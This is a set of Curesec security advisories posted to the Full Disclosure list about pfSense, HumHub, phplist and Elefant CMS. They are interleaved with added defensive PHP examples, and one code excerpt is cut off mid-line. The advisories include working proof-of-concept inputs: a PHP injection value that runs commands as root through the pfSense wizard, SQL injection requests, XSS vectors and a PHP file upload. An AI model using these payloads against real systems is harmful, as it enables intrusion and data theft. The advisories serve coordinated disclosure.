[FD] pfsense 2.3.2: CSRF

2017-03-27 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    pfsense 2.3.2
Fixed in:            2.3.3
Fixed Version Link:  https://pfsense.org/download/
Vendor Website:      https://www.pfsense.org/
Vulnerability Type:  CSRF
Remote Exploitable:  Yes
Reported to vendor:  02/06/2017
Disclosed to public: 03/24/2017
Release mode:        Coordinated Release
CVE:                 requested via DWF
Credits:             Tim Coen of Curesec GmbH

2. Overview

pfsense is an open source firewall. The web interface is written in PHP. In
version 2.3.2-RELEASE (amd64), the actions of creating and deleting firewall
rules are vulnerable to CSRF, enabling an attacker to edit these rules with a
little bit of social engineering.

3. Details

CVSS: Medium; 5.4 https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L

Description: The easyrule.php script performs rule changes without CSRF
protection, which allows an attacker to create or delete firewall rules via a
forged request.

Proof of Concept:

GET /easyrule.php?action=pass&int=LAN&proto=any&src=192.168.1.1&dst=192.168.1.1&dstport=80&ipproto=inet
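The PoC works because a single GET with the rule in the query string is enough to change the ruleset. As an added illustration (not pfSense's code), the guard below shows what a state-changing endpoint has to check before touching rules: POST only, a session-bound token compared in constant time, and an Origin header that matches the UI's host when the browser sends one. `csrf_guard`, `csrf_token`, the host `fw.example.lan` and the `$server`/`$request` arrays are constructed for this example.

```php
<?php
// Added example, not pfSense code. A guard that a state-changing endpoint
// (the advisory's easyrule.php "action=pass" / "action=block") would call
// before touching the ruleset. A plain GET from an <img> tag or a link can
// satisfy none of these checks, which is what makes the one-line PoC work.

/** Issue (or reuse) a per-session token kept server-side in the session array. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/**
 * Returns null when the request may proceed, otherwise a short reason string.
 * $server and $request stand in for $_SERVER and $_POST (constructed for the
 * example); $expectedHost is the host the firewall's web UI is served from.
 */
function csrf_guard(array $server, array $request, array $session, string $expectedHost): ?string
{
    $method = $server['REQUEST_METHOD'] ?? 'GET';
    if ($method !== 'POST') {
        return "state change over $method refused";
    }
    if (isset($server['HTTP_ORIGIN'])) {
        $origin = parse_url($server['HTTP_ORIGIN'], PHP_URL_HOST);
        if ($origin !== $expectedHost) {
            return 'cross-site origin';
        }
    }
    $sent     = $request['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    if ($expected === '' || !is_string($sent) || !hash_equals($expected, $sent)) {
        return 'missing or invalid token';   // hash_equals: constant-time compare
    }
    return null;
}

// Constructed requests mirroring the advisory's rule-creation parameters.
$session = [];
$token   = csrf_token($session);
$rule    = ['action' => 'pass', 'int' => 'LAN', 'proto' => 'any', 'src' => '192.168.1.1',
            'dst' => '192.168.1.1', 'dstport' => '80', 'ipproto' => 'inet'];
$host    = 'fw.example.lan';

// 1. The PoC shape: GET with the rule in the query string and no token.
$r = csrf_guard(['REQUEST_METHOD' => 'GET'], $rule, $session, $host);
if ($r === null) throw new RuntimeException('GET must be refused');

// 2. A form auto-submitted from another site cannot know the session token.
$r = csrf_guard(['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://evil.example'],
                $rule, $session, $host);
if ($r === null) throw new RuntimeException('cross-site POST must be refused');

// 3. A same-origin POST without the token is still refused.
$r = csrf_guard(['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => "https://$host"],
                $rule, $session, $host);
if ($r === null) throw new RuntimeException('token-less POST must be refused');

// 4. The legitimate UI submits the token together with the form fields.
$r = csrf_guard(['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => "https://$host"],
                $rule + ['csrf_token' => $token], $session, $host);
if ($r !== null) throw new RuntimeException("legitimate request refused: $r");

echo "csrf_guard behaved as expected\n";
```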

4. Solution

To mitigate this issue please upgrade at least to version 2.3.3:

https://pfsense.org/download/

Please note that a newer version might already be available.

5. Report Timeline

02/06/2017 Informed Vendor about Issue
02/07/2017 Vendor confirms + fixes issues in git
02/20/2017 Vendor releases fix + vendor advisory
03/24/2017 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/pfsense-232-CSRF-198.html
 
--
blog: https://www.curesec.com/blog
Atom Feed: https://www.curesec.com/blog/feed.xml
RSS Feed: https://www.curesec.com/blog/rss.xml
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] pfsense 2.3.2: XSS

2017-03-27 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    pfsense 2.3.2
Fixed in:            2.3.3
Fixed Version Link:  https://pfsense.org/download/
Vendor Website:      https://www.pfsense.org/
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  02/06/2017
Disclosed to public: 03/24/2017
Release mode:        Coordinated Release
CVE:                 requested via DWF
Credits:             Tim Coen of Curesec GmbH

2. Overview

pfsense is an open source firewall. The web interface is written in PHP. In
version 2.3.2-RELEASE (amd64), it is vulnerable to reflected XSS. XSS can lead
to disclosure of cookies, session tokens etc.

3. Details

XSS 1

CVSS: Medium; 6.1 https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Description: When performing a package reinstall via the package manager, the
"from" and "to" parameter are vulnerable to reflected XSS.

Proof of Concept:

http://192.168.178.60/pkg_mgr_install.php?mode=reinstallpkg&pkg=pfSense-pkg-arping&from='">&to='">

Note that while the "pkg" parameter must be a valid package, it does not need
to actually be installed on the system.

Code:

pkg_mgr_install.php 

XSS 2

CVSS: Medium; 4.7 https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N

Description: The pkg_filter parameter of the pkg.php file is vulnerable to
reflected XSS. It should be noted that the xml parameter must point to an
existing xml file, which must contain a field of type sorting with the
include_filtering_inputbox tag set. According to the vendor, the FreeRADIUS
package is affected.

Proof of Concept:

192.168.10.150/pkg.php?xml=miniupnpd.xml&pkg_filter='">

Code:

pkg.php echo "  Filter text:  ";

4. Solution

To mitigate this issue please upgrade at least to version 2.3.3:

https://pfsense.org/download/

Please note that a newer version might already be available.

5. Report Timeline

02/06/2017 Informed Vendor about Issue
02/07/2017 Vendor confirms + fixes issues in git
02/20/2017 Vendor releases fix + vendor advisory
03/24/2017 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/pfsense-232-XSS-197.html
 

[FD] pfsense 2.3.2: Code Execution

2017-03-27 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    pfsense 2.3.2
Fixed in:            2.3.3
Fixed Version Link:  https://pfsense.org/download/
Vendor Website:      https://www.pfsense.org/
Vulnerability Type:  Code Execution
Remote Exploitable:  Yes
Reported to vendor:  02/06/2017
Disclosed to public: 03/24/2017
Release mode:        Coordinated Release
CVE:                 requested via DWF
Credits:             Tim Coen of Curesec GmbH

2. Overview

pfsense is an open source firewall. The web interface is written in PHP. In
version 2.3.2-RELEASE (amd64), the setup wizard is vulnerable to code
execution.

It should be noted that by default, only an administrator can access the setup
wizard. By default, administrators have far-reaching permissions via the wizard
and via other functionality. There are however some custom configurations where
this vulnerability could lead to privilege escalation or undesired code
execution.

Unknown to us, this issue had previously been discussed on the GitHub page of
OPNsense (a fork of pfsense), although it was not classified as a
vulnerability.

3. Details

CVSS: Medium; 6.8 https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

When updating a config field, user input is passed to eval. For most config
types the input is sanitized. However, the sanitization can be bypassed, and
there is no sanitization at all for the config type interfaces_selection. Both
of these issues can lead to code execution.

An attacker needs an account with the privilege to use the wizard ("WebCfg -
pfSense wizard subsystem page"). The attack still works even if the privilege
"User - Config - Deny Config Write" is set, which would normally prevent the
user from performing changes on the server or from resetting the admin
password.

To reproduce the issue, visit
https://192.168.10.150/wizard.php?xml=openvpn_wizard.xml, follow the
instructions, and at the step where the parameter "interface" is used, use
wan";echo exec("id");" as the value.

Note also that the addslashes filter for types other than interfaces_selection
can be bypassed via ${passthru($_GET[x])}.

Proof of Concept:

POST /wizard.php HTTP/1.1
Host: 192.168.10.150
Content-Length: 506

__csrf_magic=sid%3A57913ee89f117b1d40fec5c590fe10d401717053%2C1450275812&xml=openvpn_wizard.xml&stepid=9&interface=wan";echo exec("id");"&protocol=TCP&localport=1194&description=fyjfyfyj&tlsauthentication=on&generatetlskey=on&dhparameters=2048&crypto=AES-256-CBC&digest=SHA1&engine=none&tunnelnet=&localnet=&concurrentcon=&compression=&dynip=on&addrpool=on&defaultdomain=&dnsserver1=&dnserver2=&dnserver3=&dnserver4=&ntpserver1=&ntpserver2=&nbttype=0&nbtscope=&winsserver1=&winsserver2=&advanced=&next=Next ->

uid=0(root) gid=0(wheel) groups=0(wheel)

Code:

/wizard.php

function update_config_field($field, $updatetext, $unset, $arraynum, $field_type) {
    [...]
    if($field_type == "interfaces_selection") {
        $var = "\$config{$field_conv}";
        $text = "if (isset({$var})) unset({$var});";
        $text .= "\$config" . $field_conv . " = \"" . $updatetext . "\";";
        eval($text);
        return;
    }
    [..]
    $text = "\$config" . $field_conv . " = \"" . addslashes($updatetext) . "\";";
    eval($text);
}
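The root problem in the code above is that a PHP statement is assembled from the user value and handed to eval, and addslashes only escapes quotes and backslashes, so a `${...}` interpolation sequence survives. As an added illustration (not pfSense's code), the following performs the same nested assignment by walking the path inside the array, so the value is stored as an inert string whatever it contains. `parse_field_path`, `set_config_path`, `eval_text_as_built` and the sample `$config` array are constructed for this example.

```php
<?php
// Added example, not pfSense code. Stores a wizard value into the nested
// $config array by walking a path such as ['openvpn']['server'][0]['interface']
// instead of generating PHP source for eval(). Since no source text is built,
// neither a closing double quote nor a "${...}" interpolation sequence in the
// value has any meaning: the string is stored exactly as received.

/**
 * Parse a field path in the wizard's own notation ("['a']['b'][0]") into an
 * array of keys. Quoted segments become strings, bare digits become ints.
 * Returns null for anything that is not a sequence of such segments.
 */
function parse_field_path(string $path): ?array
{
    $keys = [];
    $rest = $path;
    while ($rest !== '') {
        if (preg_match("/^\\[\\s*'([^']*)'\\s*\\]/", $rest, $m)) {
            $keys[] = $m[1];
        } elseif (preg_match('/^\[\s*(\d+)\s*\]/', $rest, $m)) {
            $keys[] = (int) $m[1];
        } else {
            return null;                   // not a ['key'] or [n] segment
        }
        $rest = substr($rest, strlen($m[0]));
    }
    return $keys === [] ? null : $keys;
}

/**
 * Assign $value at $path inside $config, creating intermediate arrays.
 * Returns false if the path is malformed or runs into an existing scalar.
 */
function set_config_path(array &$config, string $path, string $value): bool
{
    $keys = parse_field_path($path);
    if ($keys === null) {
        return false;
    }
    $node = &$config;
    foreach ($keys as $key) {
        if (!is_array($node)) {
            return false;
        }
        if (!array_key_exists($key, $node)) {
            $node[$key] = [];
        }
        $node = &$node[$key];
    }
    $node = $value;                        // plain assignment, nothing is evaluated
    return true;
}

/**
 * For comparison only: the statement text the page's addslashes() branch
 * would hand to eval(). It is returned as a string and never executed here.
 */
function eval_text_as_built(string $fieldConv, string $value): string
{
    return "\$config" . $fieldConv . " = \"" . addslashes($value) . "\";";
}

// Constructed sample config and a constructed value that carries both tricks
// the advisory names: a quote to close the literal and a ${...} sequence.
$config  = ['openvpn' => ['server' => [0 => ['interface' => 'lan']]]];
$path    = "['openvpn']['server'][0]['interface']";
$hostile = 'wan";${phpversion()}"';

if (!set_config_path($config, $path, $hostile)
    || $config['openvpn']['server'][0]['interface'] !== $hostile) {
    throw new RuntimeException('value should be stored verbatim');
}
if (set_config_path($config, "['openvpn'][junk", 'x')) {
    throw new RuntimeException('malformed path should be rejected');
}
// addslashes() escapes the quote but leaves ${phpversion()} in place, so the
// generated source would still contain an interpolation expression.
if (strpos(eval_text_as_built($path, $hostile), '${phpversion()}') === false) {
    throw new RuntimeException('addslashes does not neutralise ${...}');
}
echo 'value stored without eval: ', $config['openvpn']['server'][0]['interface'], PHP_EOL;
```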

4. Solution

To mitigate this issue please upgrade at least to version 2.3.3:

https://pfsense.org/download/

Please note that a newer version might already be available.

5. Report Timeline

02/06/2017 Informed Vendor about Issue
02/07/2017 Vendor confirms + fixes issues in git
02/20/2017 Vendor releases fix + vendor advisory
03/24/2017 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/pfsense-232-Code-Execution-199.html
 

[FD] HumHub 0.20.1 / 1.0.0-beta.3: Code Execution

2017-03-17 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    HumHub 0.20.1 / 1.0.0-beta.3
Fixed in:            1.0.0
Fixed Version Link:  https://www.humhub.org/en/download/default/form?version=1.0.0&type=zip
Vendor Website:      https://www.humhub.org/
Vulnerability Type:  Code Execution
Remote Exploitable:  Yes
Reported to vendor:  01/10/2016
Disclosed to public: 03/17/2017
Release mode:        Coordinated Release
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Overview

HumHub is a social media platform written in PHP. In version 0.20.1 as well as
1.0.0-beta.3, it is vulnerable to Code Execution as some functionality allows
the uploading of PHP files. Successful exploitation requires specific server
settings. A user account is required as well, but registration is open by
default.

3. Details

CVSS: High 7.6 AV:N/AC:H/Au:N/C:C/I:C/A:C

Most of the file uploads of HumHub check the file extension or file type before
uploading a file. However, the file upload of the "What's on your mind?"-text
box allows upload of arbitrary files.

An .htaccess file forbids the execution of PHP code in uploaded files, but some
servers are configured not to read .htaccess files. This is for example the
case with default Apache configurations. Because of this, uploaded files should
be checked to ensure they do not have dangerous file extensions.

An account is needed, but the registration is open by default.

An admin does have the option to configure which files are allowed here:
http://localhost/humhub-0.20.0/index.php?r=admin%2Fsetting%2Ffile. But by
default, all files are allowed (although .htaccess is renamed).

It should also be noted that the documentation specifically mentions that the
upload directory needs to be protected. However, it is to be assumed that not
all users follow this suggestion, especially as there is no warning in the
installation process itself.

Proof of Concept:

POST /humhub-0.20.1/index.php?r=file%2Ffile%2Fupload&objectModel=&objectId= HTTP/1.1
Host: localhost
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF-Token: TzMwdHgxWkcafVg5EHsjKyBeQS0fUCMBeHdxPg1wDiV2cEZZN3xrDw==
X-Requested-With: XMLHttpRequest
Content-Length: 1080
Content-Type: multipart/form-data; boundary=---101749290911301792911842334968
Cookie: [...]
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

-101749290911301792911842334968
Content-Disposition: form-data; name="_csrf"

TzMwdHgxWkcafVg5EHsjKyBeQS0fUCMBeHdxPg1wDiV2cEZZN3xrDw==
-101749290911301792911842334968
Content-Disposition: form-data; name="message"

-101749290911301792911842334968
Content-Disposition: form-data; name="notifyUserInput"

-101749290911301792911842334968
Content-Disposition: form-data; name="containerGuid"

3edb07bd-969f-4da3-a4bc-3e2f92a6474c
-101749290911301792911842334968
Content-Disposition: form-data; name="containerClass"

humhub\modules\user\models\User
-101749290911301792911842334968
Content-Disposition: form-data; name="fileList"

-101749290911301792911842334968
Content-Disposition: form-data; name="files[]"; filename="test.php"
Content-Type: application/x-php

4. Solution

To mitigate this issue please upgrade at least to version 1.0.0:

https://www.humhub.org/en/download/default/form?version=1.0.0&type=zip

Please note that a newer version might already be available.

5. Report Timeline

01/10/2016 Informed Vendor about Issue
01/12/2016 Vendor confirms issue
02/10/2016 Vendor requests more time
03/27/2016 Vendor releases fix
03/17/2017 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/HumHub-0201--100-beta3-Code-Execution-196.html
 

[FD] HumHub 1.0.1: XSS

2017-03-17 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    HumHub 1.0.1 and earlier
Fixed in:            1.1.1
Fixed Version Link:  https://www.humhub.org/en/download/default/form?version=1.1.1&type=zip
Vendor Website:      https://www.humhub.org/
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  01/10/2016
Disclosed to public: 03/17/2017
Release mode:        Coordinated Release
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Overview

HumHub is a social media platform written in PHP. In version 1.0.1 and earlier,
it is vulnerable to a reflected XSS attack if debugging is enabled, as well as
a self-XSS attack. This allows an attacker to steal cookies, inject JavaScript
keyloggers, or bypass CSRF protection.

3. Details

XSS 1: Reflected XSS

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description: When the debug mode is enabled, which it is by default, the
UserSearch parameter is vulnerable to reflected XSS. Additionally, the
resulting error page discloses all cookies (even httpOnly cookies) and the
contents of the $_SERVER array.

Proof of Concept:

http://localhost/humhub-0.20.0/index.php?UserSearch[last_login]=alert(1)&r=admin%2Fuser

XSS 2: DOM-based Self-XSS

CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N

There is a reflected DOM-based self-XSS vulnerability in HumHub. It may be
possible to exploit this issue via ClickJacking in some browsers.

Proof of Concept:

Visit the profile of a user:
http://localhost/humhub-0.20.0/index.php?r=space%2Fspace&sguid=d2f06d0a-47e1-4549-b469-c8a1df48faca

In the "What's on your mind?" text box enter: '">

4. Solution

To mitigate this issue please upgrade at least to version 1.1.1:

https://www.humhub.org/en/download/default/form?version=1.1.1&type=zip

Please note that a newer version might already be available.

5. Report Timeline

01/10/2016 Informed Vendor about Issue
01/12/2016 Vendor confirms issue
02/10/2016 Vendor requests more time
08/16/2016 Vendor releases partial fix
09/26/2016 Vendor releases fix
03/27/2017 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/HumHub-101-XSS-195.html
 

[FD] phplist 3.2.6: XSS

2017-03-17 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    phplist 3.2.6
Fixed in:            3.3.1
Fixed Version Link:  https://sourceforge.net/projects/phplist/files/phplist/3.3.1/phplist-3.3.1.zip/download
Vendor Website:      https://www.phplist.org/
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  01/10/2017
Disclosed to public: 02/20/2017
Release mode:        Coordinated Release
CVE:                 n/a (not requested)
Credits:             Tim Coen of Curesec GmbH

2. Overview

phplist is an application to manage newsletters, written in PHP. In version
3.2.6, it is vulnerable to Cross Site Scripting.

The application contains one reflected XSS, and multiple persistent XSS
vulnerabilities. The persistent XSS vulnerabilities are only exploitable by
users with specific privileges.

3. Details

Reflected XSS

CVSS: Medium 6.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

The page parameter is vulnerable to reflected XSS.

Proof of Concept:

http://localhost/lists/admin/?page=send\'\">alert(8)&id=187&tk=c

Persistent XSS

CVSS: Medium 5.5 CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N

Various components of the administration interface are vulnerable to persistent
XSS. While a user account is required to exploit these issues, they may be used
by less privileged users to escalate their privileges.

Persistent XSS: List Name

The name of a list is echoed in various locations without encoding, leading to
persistent XSS. An account with the privilege to create a list is required.

Add new list: http://localhost/lists/admin/?page=editlist&tk=c and as name use: list'">

To trigger the payload, visit:
- Add new subscribers to list: http://localhost/lists/admin/?page=importsimple&list=84&tk=c
- Overview of all lists: http://localhost/lists/admin/?page=list&tk=c
- List members of list: http://localhost/lists/admin/?page=members&id=3&tk=c
- View member (loaded as part of the lists tab): http://localhost/lists/admin/?page=user&id=4
- Creating a campaign (in step 4): http://localhost/lists/admin/?page=send&id=2&tk=c&tab=Lists

Persistent XSS: Subscribe Page

Various parameters of the subscribe page - such as the title - are vulnerable
to persistent XSS. An account with the privilege to edit the subscribe page is
required.

Add a new subscribe page: http://localhost/lists/admin/?page=spage and as title use: subscribe'">

To trigger the payload:
- Visit the subscribe page: http://localhost/lists/index.php?p=subscribe&id=1
- Visit the subscribe page overview: http://localhost/lists/admin/?page=spage

Persistent XSS: Bounce Rule

The expression parameter of bounce rules is vulnerable to persistent XSS. An
account with the privilege to edit bounce rules is required.

Add a new bounce rule: http://localhost/lists/admin/?page=bouncerules&type=active and as regular expression use: test'">

To trigger the payload, visit: http://localhost/lists/admin/?page=bouncerules&type=active

4. Solution

To mitigate this issue please upgrade at least to version 3.3.1:

https://sourceforge.net/projects/phplist/files/phplist/3.3.1/phplist-3.3.1.zip/download

Please note that a newer version might already be available.

5. Report Timeline

01/10/2017 Informed Vendor about Issue
01/16/2017 Vendor confirms
02/15/2017 Asked Vendor to confirm that new release fixes issues
02/15/2017 Vendor confirms
02/20/2017 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/phplist-326-XSS-194.html
 

[FD] phplist 3.2.6: SQL Injection

2017-03-17 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    phplist 3.2.6
Fixed in:            3.3.1
Fixed Version Link:  https://sourceforge.net/projects/phplist/files/phplist/3.3.1/phplist-3.3.1.zip/download
Vendor Website:      https://www.phplist.org/
Vulnerability Type:  SQL Injection
Remote Exploitable:  Yes
Reported to vendor:  01/10/2017
Disclosed to public: 02/20/2017
Release mode:        Coordinated Release
CVE:                 n/a (not requested)
Credits:             Tim Coen of Curesec GmbH

2. Overview

phplist is an application to manage newsletters, written in PHP. In version
3.2.6, it is vulnerable to SQL injection.

The application contains two SQL injections, one of which is in the
administration area and one which requires no credentials. Additionally, at
least one query is not properly protected against injections. Furthermore, a
query in the administration area discloses some information on the password
hashes of users.

3. Details

SQL Injection 1: Edit Subscription

CVSS: High 7.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

It is possible for an unauthenticated user to perform an SQL injection when
updating the subscription information of an already subscribed user.

The protection against SQL injection relies on a combination of a custom magic
quotes function which applies addslashes to all input values and a function
which applies htmlspecialchars to all inputs. Additionally, some input values
are cast to integers to prevent injections. addslashes protects against
injections into arguments which are placed into single quotes, while
htmlspecialchars protects against injections into double quotes.

It should be noted that neither addslashes nor htmlspecialchars are recommended
to prevent SQL Injection.

The update functionality is vulnerable to SQL injection because it interpolates
the keys of the POST data into the query, while addslashes is applied only to
the values of the POST data, not to its keys.

Proof of Concept:

POST /lists/index.php?p=subscribe&uid=f8082b7cc4da7f94ba42d88ebfb5b1e2&email=foo%40example.com HTTP/1.1
Host: localhost
Connection: close
Content-Length: 209

email=foo%40example.com&emailconfirm=foo%40example.com&textemail=1&list%5B2 or extractvalue(1,version()) %5D=signup&listname%5B2%5D=newsletter&VerificationCodeX=&update=Subscribe+to+the+selected+newsletters%27

The proof of concept is chosen for simplicity and will only work if error
messages are displayed to the user. If this is not the case, other techniques
can be used to extract data from the database.

Code:

/lists/admin/subscribelib2.php

$lists = '';
if (is_array($_POST['list'])) {
    while (list($key, $val) = each($_POST['list'])) {
        if ($val == 'signup') {
            $result = Sql_query("replace into {$GLOBALS['tables']['listuser']} (userid,listid,entered) values($userid,$key,now())");
            # $lists .= " * ".$_POST["listname"][$key]."\n";
        }
    }
}
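As an added illustration (not phplist's code), the following reconstructs the value-only escaping the advisory describes to show that array keys reach the query untouched, and puts a hardened list signup next to it that validates every list id as an integer and binds it as a parameter instead of interpolating it. `escape_values_only`, `signup_queries_unsafe`, `list_signup_ids`, `signup_lists` and the sample `$post` array are constructed for this example; the in-memory database needs the pdo_sqlite extension.

```php
<?php
// Added example, not phplist code. Models the gap the advisory describes:
// escaping is applied to POST *values* only, so a key under $_POST['list']
// that carries SQL text is never touched before it is interpolated.

/** Reconstruction of a magic-quotes style filter: addslashes on values, recursively. */
function escape_values_only(array $input): array
{
    $out = [];
    foreach ($input as $key => $value) {
        // Only the value is escaped; $key is copied as-is.
        $out[$key] = is_array($value) ? escape_values_only($value) : addslashes((string) $value);
    }
    return $out;
}

/**
 * Vulnerable shape (same idea as subscribelib2.php): the key is interpolated
 * straight into SQL text. Returns the statements it would run, for inspection.
 */
function signup_queries_unsafe(array $post, int $userid): array
{
    $queries = [];
    foreach ($post['list'] ?? [] as $key => $val) {
        if ($val === 'signup') {
            $queries[] = "replace into listuser (userid,listid,entered) values($userid,$key,now())";
        }
    }
    return $queries;
}

/**
 * Hardened version, step 1: a list id is only used if the key is a string of
 * digits. Anything else is ignored. Returns the validated integer ids.
 */
function list_signup_ids(array $post): array
{
    $ids = [];
    foreach ($post['list'] ?? [] as $key => $val) {
        if ($val === 'signup' && ctype_digit((string) $key)) {
            $ids[] = (int) $key;
        }
    }
    return $ids;
}

/** Hardened version, step 2: the ids are bound as parameters, never interpolated. */
function signup_lists(PDO $db, int $userid, array $ids): int
{
    $stmt = $db->prepare('REPLACE INTO listuser (userid, listid, entered) VALUES (?, ?, CURRENT_TIMESTAMP)');
    foreach ($ids as $listid) {
        $stmt->execute([$userid, $listid]);
    }
    return count($ids);
}

// Constructed POST array mirroring the advisory's request: one legitimate
// list id and one key carrying SQL text (a benign placeholder, not a payload).
$post = [
    'email' => 'foo@example.com',
    'list'  => [
        '2'                => 'signup',   // PHP stores this key as int 2
        '3 or 1=1 -- tail' => 'signup',
    ],
];

$escaped = escape_values_only($post);
// The filter never sees the key: it is still present and unchanged...
if (!isset($escaped['list']['3 or 1=1 -- tail'])) {
    throw new RuntimeException('key should pass through the value-only filter');
}
// ...and the unsafe builder would interpolate it into the statement text.
if (strpos(signup_queries_unsafe($escaped, 7)[1], 'or 1=1') === false) {
    throw new RuntimeException('unsafe builder should show the interpolated key');
}
// The hardened path keeps only the integer id.
if (list_signup_ids($post) !== [2]) {
    throw new RuntimeException('only integer list ids should survive validation');
}

// Run the hardened path end to end against SQLite in memory.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE listuser (userid INTEGER, listid INTEGER, entered TEXT, PRIMARY KEY (userid, listid))');
signup_lists($db, 7, list_signup_ids($post));
echo 'rows inserted: ', $db->query('SELECT COUNT(*) FROM listuser')->fetchColumn(), PHP_EOL;
```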

SQL Injection 2: Sending Campaign (Admin)

CVSS: Medium 4.7 CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

When sending a campaign, the sendformat parameter is vulnerable to SQL
injection. The injection takes place into an UPDATE, so the easiest way to
extract data is via error based SQL injection.

An account with the right to send campaigns is required to exploit this issue.

Proof of Concept:

POST /lists/admin/?page=send&id=2&tk=c&tab=Format HTTP/1.1
Host: localhost
Cookie: PHPSESSID=k6m0jgl4niq7643hohik5jgm12
Connection: close
Content-Length: 323

formtoken=27211e65922b95d986bfaf706ccd2ca0&workaround_fck_bug=1&followupto=http%3A%2F%2Flocalhost%2Flists%2Fadmin%2F%3Fpage%3Dsend%26id%3D2%26tk%3Dc%26tab%3DScheduling&htmlformatted=auto&sendformat=HTML" or extractvalue(1,version()) -- - &id=2&status=draft&id=2&status=draft&campaigntitle=campaign+meta%27%22%3E&testtarget=

Code:

// /lists/admin/send_core.php:198
$result = Sql_Query(
    sprintf('update %s set subject = "%s", fromfield = "%s", tofield = "%s", replyto ="%s", embargo = "%s", repeatinterval = "%s", repeatuntil = "%s", message = "%s", textmessage = "%s", footer = "%s", status = "%s", htmlformatted = "%s", sendformat = "%s", template = "%s" where id = %d',
        $tables['message'],
        sql_escape(strip_tags($messagedata['campaigntitle'])), /* we store the title in the subject field. Better would be to rename the DB column, but this will do for now */
        sql_escape($messagedata['fromfield']),
        sql_escape($messagedata['tofield']),
        sql_escape($messagedata['replyto']),
        sprintf('%d-%d-%d %d:%d', $messagedata['embargo']['year'], $messagedata['embargo']['month'], $messagedata['embargo']['day'], $messagedata['embargo']['hour'], $messagedata['embargo']['minute']),
        $messagedata['repeatinterval'],
        sprintf('%d-%d-%d %d:%d', $messagedata['repeatuntil']['year'], $messagedata['repeatuntil']['month'], $messagedata['repeatuntil']['day'], $messagedata['repeatuntil']['hour'], $messagedata['repeatuntil']['minute']),
        sql_escape($messagedata['message']),
        sql_escape($messagedata['textmessage']),
        sql_escape($messagedata['footer']),
        sql_escape($messagedata['status']),
        $ht

[FD] Elefant CMS 1.3.12-RC: Code Execution

2017-02-16 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Elefant CMS 1.3.12-RC
Fixed in:            1.3.13
Fixed Version Link:  https://github.com/jbroadway/elefant/releases/tag/elefant_1_3_13_rc
Vendor Website:      https://www.elefantcms.com/
Vulnerability Type:  Code Execution
Remote Exploitable:  Yes
Reported to vendor:  09/05/2016
Disclosed to public: 02/02/2017
Release mode:        Coordinated Release
CVE:                 n/a (not requested)
Credits:             Tim Coen of Curesec GmbH

2. Overview

Elefant is a content management system written in PHP. In version 1.3.12-RC, it
is vulnerable to code execution because of two different vulnerabilities. It
allows the upload of files with dangerous type, as well as PHP code injection.

An account is required to exploit these issues.

3. Details

Upload of file with dangerous type

CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

The file upload forbids the uploading of files with the .php extension, but
allows uploading of files with a number of other dangerous extensions leading
to code execution and XSS.

A user account is required which has the right to upload and manage files. By
default, the editor or admin role have this right.

Proof of Concept:

POST /filemanager/upload/drop HTTP/1.1
Host: localhost
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=--multipartformboundary1472116478634
X-Requested-With: XMLHttpRequest
Content-Length: 316
